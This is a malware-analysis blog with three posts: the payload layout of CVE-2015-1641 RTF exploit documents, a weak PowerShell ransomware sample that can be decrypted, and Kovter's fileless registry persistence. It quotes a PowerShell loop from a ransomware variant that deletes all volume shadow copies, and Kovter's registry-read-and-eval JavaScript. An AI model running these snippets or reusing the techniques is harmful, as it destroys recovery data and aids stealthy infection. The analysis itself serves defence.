Monday 26 October 2015

RTF Exploit Document Extraction

Intro


On April 14, 2015, Microsoft released MS15-033.  This patch release included a fix for a memory corruption error in the SmartTag parsing library of MS Office 2007/2010/2013.  This vulnerability was assigned CVE-2015-1641.

I won't rehash the technicalities here, as others have already done a thorough job documenting the specifics (see here and here).  The important part for the purpose of this discussion is the makeup of the exploit document itself, and perhaps more so that of the encoded binary data used to hide the intended malware payload.

Note: if you want to follow along, here is a sample (hash: aafc9a94b1676172dfc55ae5660b5263888c603821b73b6d2540a7578b67c431) which exhibits the described behaviour.

RTF Document


I examined dozens of documents which exploit this vulnerability and they appear to have consistent structures, suggesting that either they are being built with a kit or builder of some sort or that they are all being constructed via modification of an initial in-the-wild example or proof of concept.

The documents are RTF format containing 4 objects: a reference to an OLE control (otkloadr.dll - see here for why) and 3 Microsoft Word document objects. As well, there is a large binary data chunk appended to the end of the file, after the valid RTF structure ends.

One of the Word documents is responsible for triggering the vulnerability, and another contains a large binary component which is used in a heap spray.  This binary data contains a ROP chain and a first stage shellcode. The first stage shellcode locates and executes the second stage shellcode from the large binary chunk, and this second stage is responsible for decrypting itself.

Second stage shellcode, pre-decryption
Second stage shellcode, decrypted, showing ROR7 hash based API lookups
(resolution of hashes to API calls using FLARE team ShellCode Hashes ida-python plugin)
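
As a rough illustration of what a ROR7 hash based API lookup involves, the sketch below implements one common rotate-right-by-7-and-add hash in Python. The exact variant used by this shellcode (for example, whether the name is uppercased or a terminating null is hashed) is not stated in this post, so the function names and details here are assumptions rather than a reconstruction of the sample.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by `count` bits."""
    count %= 32
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror7_add_hash(name: bytes) -> int:
    """Assumed variant: rotate the running hash right by 7, then add each byte."""
    h = 0
    for b in name:
        h = (ror32(h, 7) + b) & 0xFFFFFFFF
    return h


def resolve(target_hash: int, export_names):
    """Return the first export name whose hash matches, or None.

    This mirrors what shellcode does while walking a DLL export table:
    it never stores API names, only their precomputed hashes.
    """
    for name in export_names:
        if ror7_add_hash(name.encode("ascii")) == target_hash:
            return name
    return None
```

Precomputing the hash of every export in kernel32.dll and looking up the constants seen in the disassembly is essentially what a hash-resolution plugin automates.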

Once decrypted, this shellcode is responsible for some key actions:

  1. Locate, decrypt, and execute the malware binary payload.
  2. Patch some key bytes in the registry to mask the MS Word crash (pursuant to the exploit)
  3. Locate, decrypt and display the decoy document. 

The malware payload and decoy document are both contained inside the large binary segment appended to the end of the RTF file.  The steps for locating and decrypting both the malware and the decoy are also found inside this second stage shellcode:

Second stage shellcode, locating and decrypting malware payload
The shellcode searches for a sequence of 0xBA bytes, and empirical evidence has shown that the binary chunk typically contains 7 consecutive 0xBA bytes to mark the start of the encrypted payload (although the shellcode does not explicitly require all seven).  The shellcode then decrypts each double word of data by XOR'ing it with the value 0xCAFEBABE and moves it to a buffer.  The end marker of 0xBBBBBBBB is sought, and again in practice a consecutive run of seven 0xBB bytes is typically seen in the samples.

Finally, using similar techniques, the shellcode extracts everything between the 0xBB markers and a run of 0xBC bytes.  This block of data is the encrypted decoy document, and it is similarly decrypted using an XOR operation against each Dword - this time using 0xBAADF00D as the xor key.

In summary then we can see that the overall high level structure of this binary data segment is:

Stage2_SC | 0xBA's | (enc) Payload | 0xBB's| (enc) Decoy | 0xBC's
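
The layout above can be carved with a few lines of Python. This is a minimal sketch and not the script referenced in this post: the function names, the minimum marker run of four bytes, and the little-endian interpretation of each dword (natural for x86 shellcode) are all assumptions.

```python
import struct

PAYLOAD_KEY = 0xCAFEBABE  # XOR key for the malware payload (from the analysis)
DECOY_KEY = 0xBAADF00D    # XOR key for the decoy document (from the analysis)


def xor_dwords(data: bytes, key: int) -> bytes:
    """XOR each little-endian 32-bit word with `key`; leftover bytes are kept as-is."""
    whole = len(data) - len(data) % 4
    words = struct.unpack("<%dI" % (whole // 4), data[:whole])
    decoded = struct.pack("<%dI" % len(words), *(w ^ key for w in words))
    return decoded + data[whole:]


def find_marker(blob: bytes, value: int, start: int, min_run: int = 4):
    """Return (begin, end) of the first run of at least `min_run` marker bytes."""
    begin = blob.find(bytes([value]) * min_run, start)
    if begin < 0:
        raise ValueError("marker 0x%02X not found" % value)
    end = begin
    while end < len(blob) and blob[end] == value:
        end += 1
    return begin, end


def extract(blob: bytes):
    """Carve and decrypt (payload, decoy) from the appended binary segment."""
    _, payload_start = find_marker(blob, 0xBA, 0)
    payload_end, decoy_start = find_marker(blob, 0xBB, payload_start)
    decoy_end, _ = find_marker(blob, 0xBC, decoy_start)
    payload = xor_dwords(blob[payload_start:payload_end], PAYLOAD_KEY)
    decoy = xor_dwords(blob[decoy_start:decoy_end], DECOY_KEY)
    return payload, decoy
```

One caveat of this simple approach: if the encrypted data happens to begin or end with a byte equal to the adjacent marker value, the carved region will be off by that byte, so the output should be sanity-checked (for example, the payload should start with an MZ header).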

Obviously this process is far too tedious for manual repetition, so I constructed a rudimentary script to seek, extract, and dump both the malware payload and decoy documents to disk.  It can be grabbed from github here.

Concluding Remarks


In summary, an important fact to note here is that while the CVE-2015-1641 vulnerability itself is new, there have been (and likely will continue to be) numerous vulnerabilities in MS Office handling of documents (in particular RTF files).  During the analysis of samples for this post, it became apparent that the second stage shellcode found in the examined CVE-2015-1641 exploit documents has been reused frequently, and simply shoe-horned into the RTF exploit du jour.

Numerous samples for CVE-2014-1761 and CVE-2012-0158, for example, use the same format of Stage2_SC + Marker + MalwarePayload + Marker + Decoy + Marker in their malicious document payloads.  As such, the script referenced above should work equally well against other RTF based exploit documents which happen to utilize this same binary data segment format.

Friday 11 September 2015

How to fail at ransomware

Intro


Ransomware sucks. It is annoying and persistent, and apparently very lucrative. For this reason alone we can expect, and indeed find, that even the unskilled will try their hand at developing a ransomware payload. What better low-cost-of-entry method than PowerShell?  The only problem is (at least for the samples described below) that using deterministic symmetric encryption sorta, well, renders the entire encryption process trivially reversible...

Analysis


I had originally been taking a look at this CHM dropper [md5: 21e1a87bd0418381a1bc8df088ee5c91] which carries out a download and execute of a powershell based "ransomware" script [md5: be03eb109cab04a1a70b5bbc7b22949e].

The download and execute from the CHM:

CHM dropper referencing http://sploogetube.mobi

Colorful domain names notwithstanding, we can see the simplicity here. Looking at the actual ransomware script reveals a very basic .NET approach to enumerating all drives on the system, and then systematically recursing for a laundry list of various file extensions.  Each matching file is then sent through the encryption routine.

I have cleaned up some of the variable names for legibility here, but obfuscation can't really mask the issues with this one.



In a more legitimate attempt to effect a crypto based ransomware ploy, one would need to encrypt the victim data asymmetrically.  There are a few reasonable ways to go about this, but unfortunately the author of this script decided to go another way entirely - the way which uses symmetric encryption with a completely deterministic key and IV.

I had originally written a simple decryption script for this corresponding PowerShell encryption script, but after re-checking the download site after a couple of days it does appear that the script was/is being modified (reference md5: 9fe45fc4c402932248cd2c26b65f883d). The revision process has not improved the overall sophistication of the encryption, however; it has merely changed the salt value being used to generate the Rijndael encryption key. I updated my decryption script (link at bottom) to accommodate a user-supplied salt value which can be extracted from line 7 of the original encryption script [see update below]:


Another interesting change is that the 'decryption instructions' HTML file that gets written to the victims' hard drive has been completely redesigned and is an obvious style ripoff of the Cryptolocker ransom instruction page:

Original decryption instructions from be03eb109cab04a1a70b5bbc7b22949e

New version from 9fe45fc4c402932248cd2c26b65f883d

These instruction files also reference an ID# which is obviously supposed to lend support to the fact that there is some asymmetric encryption taking place which requires a specific private key to decrypt.  It is possible that this ID is somehow deterministic, although it is definitely not machine based - I tried downloading the script from multiple different IP addresses using different operating systems on a single day and received an identical copy of the script having the same ID# each time.  It may be date based, and I will update this post with any additional information that comes out of future checks.

Why you never pay the ransom


Further examination of the encryption script shows that any files less than 42871 bytes in size will be encrypted in their entirety, but those above or equal to this size will have only the first 42871 bytes encrypted.  


I would almost pay the ransom value just to know why the author chose this seemingly arbitrary value of 42871 bytes.  The net result of this choice, combined with the 128-bit block size and choice of zero padding, is that for any file of 42871 or more bytes, the original file will have 9 bytes of unrecoverable data.

Whenever the file length is 42871 or more bytes, the encryption will read in the first 42871 bytes, encrypt them and pad out to the next 16 byte (128 bit) boundary, which happens to be 42880 bytes. The destructive flaw in the script is that the original file is overwritten in place - thus the 9 bytes at zero-based offsets 42871 to 42879 (the 42872nd through 42880th bytes of the file) are overwritten with the tail of the padded ciphertext.  Upon decryption these bytes cannot be recovered as they were not encrypted originally but simply overwritten.
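
The arithmetic behind the lost bytes can be checked with a short Python sketch. The constant and function names are illustrative only; the 42871 byte chunk size and 16 byte block size come from the analysis above, and the sketch assumes a file large enough to have data at the affected offsets.

```python
CHUNK = 42871  # bytes the script reads and encrypts (from the analysis)
BLOCK = 16     # 128-bit cipher block size, in bytes


def padded_length(n: int, block: int = BLOCK) -> int:
    """Round n up to the next multiple of the block size."""
    return (n + block - 1) // block * block


def clobbered_offsets(chunk: int = CHUNK, block: int = BLOCK) -> range:
    """Zero-based file offsets overwritten by ciphertext but never encrypted."""
    return range(chunk, padded_length(chunk, block))


lost = clobbered_offsets()
print(padded_length(CHUNK), len(lost), lost[0], lost[-1])
```

The plaintext that originally lived at those offsets was never fed to the cipher, so no key can bring it back.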

Thus - even if you actually paid the ransom - it would only fully recover files which were less than 42871 bytes in size.

In case you were infected with this, I wrote a simple decryption script to recover the files subject to the restrictions described above.  It can be found here.

Update 09/17/2015


New variants of this crypto script are now attempting to delete any existing volume shadow copies prior to executing the encryption routine:

$hdGhncrThhsHhjs = Get-WmiObject Win32_ShadowCopy
ForEach($QhdThscGhsjdR in $hdGhncrThhsHhjs) {
    $QhdThscGhsjdR.Delete()
}

Regarding the salt used in the decryption script, these recent variations have modified the location of the salt from where it had previously existed at line 7 of the crypto script. The salt required by the decryption script is set by the call to GetBytes and stored in a variable used as the second argument to Security.Cryptography.Rfc2898DeriveBytes.
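
To see why a fixed password and salt make the key and IV fully predictable, here is a minimal Python sketch of the derivation. Rfc2898DeriveBytes implements PBKDF2 (HMAC-SHA1 with 1000 iterations by default), and successive GetBytes calls continue the same output stream, so the key and IV can be sliced from one PBKDF2 call. The password, salt, iteration count, and the 32 byte key / 16 byte IV sizes used here are placeholders and assumptions, not values taken from the sample.

```python
import hashlib


def derive_key_iv(password: bytes, salt: bytes, iterations: int = 1000,
                  key_len: int = 32, iv_len: int = 16):
    """Derive (key, iv) the way GetBytes(key_len) then GetBytes(iv_len) would."""
    stream = hashlib.pbkdf2_hmac("sha1", password, salt, iterations,
                                 key_len + iv_len)
    return stream[:key_len], stream[key_len:]


# Hypothetical inputs: substitute the password and salt recovered from the script.
key, iv = derive_key_iv(b"example-password", b"example-salt")
print(key.hex(), iv.hex())
```

Anyone holding a copy of the encryption script can run the same derivation, which is why no private key (or payment) is needed to decrypt.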



Friday 17 July 2015

Kovter analysis [part 1]

Introduction


Fileless malware has been gaining increased attention in the malware forensics community as of late. Accordingly, I have been paying particular attention to indicators and forensic analysis of threats such as Poweliks. These malware variants typically leverage the Windows registry to maintain persistence, and they avoid leaving executable files on disk.  I recently had an encounter with one such malware family - Kovter.

Kovter was originally discovered as a particularly nasty type of ransomware, but has recently been adapted to instead cash in via ad/click fraud.

In the sections below I will walk through some basic static analysis of one such sample.  Additional analysis of later stages of this malware will follow in another writeup.

In case you want to follow along, the sample being analysed in this discussion is: 6ca41538ae9c25b259e6fcfce565b89b (many thanks to Kafeine for the sample).

Initial Infection


Upon execution of the initial infector, several checks are performed to look for security tools such as Fiddler and Wireshark, as well as for standard indicators of virtual environments (registry keys common to VirtualBox, Sandboxie, and VMware). If none are found, the malware proceeds to create a random looking registry key (using hex chars) under HKCU\Software and HKLM\Software.  Within this parent key are six values which are also named using apparently random hex characters. These registry values and their parent key appear to be named in a deterministic manner, likely derived from characteristics of the victim system (such as product id, guid, etc).  One of these registry values contains obfuscated JavaScript which ultimately unpacks and executes shellcode.  This shellcode is responsible for decrypting the data stored in a second registry value and executing it.  Interestingly, the encryption key for this activity appears to be generated uniquely upon each execution of the initial infection binary.

Fileless Persistence


After initial infection, the run key shown below in Figure 1 will be present.

Figure 1: Run key

This run key makes use of the mshta.exe application to execute a few simple javascript commands. Deobfuscated, this became (in the case under examination):
y=new ActiveXObject("WScript.Shell"); 
x=y.RegRead("HKCU\\Software\\2efd7e07\\7b5fa1aa");
eval(x);

*Note that this particular malware will write to both HKLM and HKCU if it is able.  The content written is identical in either case.

 Taking a look at the HKCU\Software\2efd7e07 key revealed the following:

Figure  2: HKCU\Software\2efd7e07 key content
The run key ultimately ran a javascript eval() command on the contents of registry value 7b5fa1aa. A closer look at this particular value revealed the block shown in Figure 3:

Figure 3: Obfuscated javascript block
Some quick JSDetox'ing and variable renaming yielded the following:


Figure 4: Deobfuscated javascript
The content of the encodedBlock variable was snipped to aid readability. The ultimate goal of this javascript code is to xor decode the content of this variable and then eval() the result. The decoded version of encodedBlock looks like this:


Figure 5: Script to execute
Again I have truncated some content to ease reading.  In this case there is a large base64 block which is being converted and then executed via powershell.exe. Naturally this base64 decoded text is just a powershell script. Figure 6 below depicts the version I cleaned up to a readable state.

Figure 6: Powershell script to launch shellcode
Variable $sc32 in the powershell script contains (unsurprisingly) shellcode to be executed from memory. The method of invocation follows a pretty standard execution flow including calls to VirtualAlloc using PAGE_EXECUTE_READWRITE permission and then CreateThread invoking the shellcode as a function from a (now) executable memory page.  Note also that it passes the memory address of the shellcode to itself as a parameter.

Shellcode Analysis

 

Once the shellcode is loaded, the overall actions are pretty standard, with a couple of interesting exceptions.

Overall steps:
  1. Locate Kernel32.dll by hashing the BaseDllName member of each entry in the InMemoryOrderModuleList for the current process.
  2. Locate the offsets for LoadLibraryA, GetProcAddress, VirtualAlloc, and ExitProcess via ordinal lookups
  3. Load advapi32.dll and then do an ordinal lookup for RegOpenKeyExA, RegQueryValueExA
Things get interesting at this point. With each execution of the initial infector, a unique registry key name is chosen to store the various values shown above in Figure 2. In the excerpt below you can see that the shellcode we have extracted (from the $sc32 variable in Figure 6) is actually referencing a location at offset 0xAD8 from its base address, and this location holds a string equal to the name of the registry key it was ultimately being stored in:

Figure 7: Loading the string variable matching the registry key
This suggests that the shellcode is modified during initial infection to correctly reference the registry values it will eventually be stored in.

Figure 8: Reference to randomly generated key
Before continuing from step 3 above, we have to locate a particular (also randomly named) registry value located within this key, and this one is also explicitly named within the shellcode:

Figure 9: Registry value which contains next stage, encrypted shellcode
  4. Load the content of this registry value (HKCU\Software\2efd7e07\fecae03a in our example) into memory.
Again, we find more evidence that the shellcode has been patched during initial infection, as this registry data is actually an RC4 encrypted executable. The length of the RC4 key, as well as the key itself are pulled directly from the shellcode, and these values are unique for each execution of the initial infector*:

Figure 10: RC4 key length

Figure 11: RC4 key

This key is then copied (using an included 'memcpy' function) to a local variable for later use:

Figure 12: copy RC4 key to local variable
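
For anyone wanting to reproduce the decryption offline, RC4 is simple enough to implement directly. The Python sketch below is a standard RC4 routine plus a small hypothetical wrapper; the key offset and length must be read out of your own copy of the shellcode, and the parameter names here are assumptions rather than anything defined by the sample.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4: key scheduling followed by keystream XOR."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_stage(shellcode: bytes, key_offset: int, key_len: int,
                  registry_data: bytes) -> bytes:
    """Slice the embedded key out of the shellcode and decrypt the registry blob.

    key_offset and key_len are hypothetical parameters: both values differ
    per infection and must be recovered from the shellcode under analysis.
    """
    key = shellcode[key_offset:key_offset + key_len]
    return rc4(key, registry_data)
```

If the key and length are correct, the decrypted output should begin with a recognisable MZ header.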
Continuing on, we see the shellcode decrypt the data from the fecae03a registry value and unpack it for execution.  To round out the shellcode execution steps:
  5. Decrypt the executable and perform required memory mapping (headers, copying sections to correct addresses, apply any relocs, etc.)
  6. Call the newly mapped file.
In a follow-up post I will walk through analysis of the running payload. Until then, feel free to contact me with any questions or comments.

* Note: not only do the encryption key and length change each time the initial infector is run, but if the registry key is deleted, a watchdog process reinserts the values immediately - and each time the data is reinserted, the encryption key is modified.